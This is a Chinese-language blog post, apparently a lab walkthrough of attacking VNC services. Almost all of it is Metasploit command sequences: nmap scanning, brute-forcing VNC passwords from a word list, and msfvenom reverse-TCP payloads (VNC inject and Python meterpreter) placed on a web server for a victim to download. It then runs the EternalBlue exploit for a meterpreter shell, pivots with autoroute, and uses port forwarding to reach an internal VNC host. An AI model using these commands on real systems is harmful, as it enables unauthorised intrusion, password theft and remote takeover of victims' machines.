Jirairya

VNC攻击

2017-10-16
hack  sec
   

VNC攻击的一些手法

安装

安装vncserver:

sudo apt-get install vnc4server

设置vncserver密码:

sudo vncpasswd

设置vnc连接时窗口的大小:

b404@ubuntu:~$ sudo vncserver :1 -geometry 1024x768 -depth 24

查看vnc激活状态:

sudo netstat -tnl | grep 5901

windows连接vnc服务器:

扫描目标IP

扫描目标:

msf > db_nmap -sT 192.168.222.147

查看vnc信息:

nmap -p 5901 -script vnc-info 192.168.222.147

暴力破解

使用msf的vnc爆破模块进行爆破:

msf > use auxiliary/scanner/vnc/vnc_login 

msf auxiliary(vnc_login) > set RHOSTS 192.168.222.147
RHOSTS => 192.168.222.147

msf auxiliary(vnc_login) > set RPORT 5901
RPORT => 5901

msf auxiliary(vnc_login) > set pass_file /root/Desktop/pass.txt
pass_file => /root/Desktop/pass.txt

msf auxiliary(vnc_login) > run

使用字典爆破成功,密码为213213,进行登陆连接:

vncviewer 192.168.222.147:5901

利用VNC Payload攻击

使用msfvenom生成vnc payload

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.222.146 lport=44455 -f exe > /var/www/html/vnc.exe

启动msf,使用exploit模块中的监听:

msf > use exploit/multi/handler
 
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.222.146
lhost => 192.168.222.146

msf exploit(handler) > set lport 44455
lport => 44455

msf exploit(handler) > set viewonly false
viewonly => false
msf exploit(handler) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.222.146:44455 

当vnc.exe该payload在目标机器上运行的时候,监听启动,并打开vncviewer:

通过meterpreter获取VNC会话

通过以下命令扫描目标机器是否有永恒之蓝漏洞:

msf > use auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.222.136
RHOSTS => 192.168.222.136
msf auxiliary(smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS      192.168.222.136  yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

当扫描出具有永恒之蓝漏洞的时候,通过msf的攻击模块攻击:

msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
 
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

sf exploit(ms17_010_eternalblue) > set RHOST 192.168.222.136
RHOST => 192.168.222.136

msf exploit(ms17_010_eternalblue) > set LHOST 192.168.222.146
LHOST => 192.168.222.146

msf exploit(ms17_010_eternalblue) > run

当通过反向连接获得meterpreter时候,可以通过run vnc分段注入VNC DLL:

通过ssh实现VNC攻击

搭建环境

攻击拓扑图

设置静态IP:

sudo vim /etc/network/interfaces

配置好,测试ping通与否:

使用putty进行ssh端口转发,连接vnc:

连接vnc成功:

使用msfvenom攻击Linux

使用msfvenom生成payload:

root@kali:~# msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.222.146 lport=555 > /root/Desktop/update.py

开启apache2服务,将update.py放置于web容器中,模拟用户下载攻击:

wget http://192.168.222.146/update.py

使用msfvenom打开监听:

msf > use exploit/multi/handler 
msf exploit(handler) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.222.146
LHOST => 192.168.222.146
msf exploit(handler) > set LPORT 555
LPORT => 555
msf exploit(handler) > exploit

查看网卡:

基于meterpreter下的vnc攻击

添加路由,使得攻击机和被攻击机处于同一网网段:

msf exploit(handler) > use post/multi/manage/autoroute 
msf post(autoroute) > set session 1
session => 1
msf post(autoroute) > exploit 

ARP扫描:

msf auxiliary(tcp) > use auxiliary/scanner/discovery/arp_sweep

TCP端口扫描:

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.0.20

set threads 10

exploit

爆破VNC:

msf auxiliary(tcp) > use auxiliary/scanner/vnc/vnc_login 

msf auxiliary(vnc_login) > set rhosts 10.0.0.20
rhosts => 10.0.0.20

msf auxiliary(vnc_login) > set RPORT 5901
RPORT => 5901

msf auxiliary(vnc_login) > set PASS_FILE /root/Desktop/pass.txt
PASS_FILE => /root/Desktop/pass.txt
msf auxiliary(vnc_login) > run

爆破出密码为213213端口转发:

meterpreter > portfwd add -l 6000 -p 5901 -r 10.0.0.20

-l :本地监听端口

-p :要连接的远程端口

-r:要连接的远程主机地址

refer:

  • https://websistent.com/how-to-use-putty-to-create-a-ssh-tunnel/
  • http://www.hackingarticles.in/vnc-tunneling-ssh/
  • http://www.hackingarticles.in/vnc-pivoting-meterpreter/

Similar Posts

Comments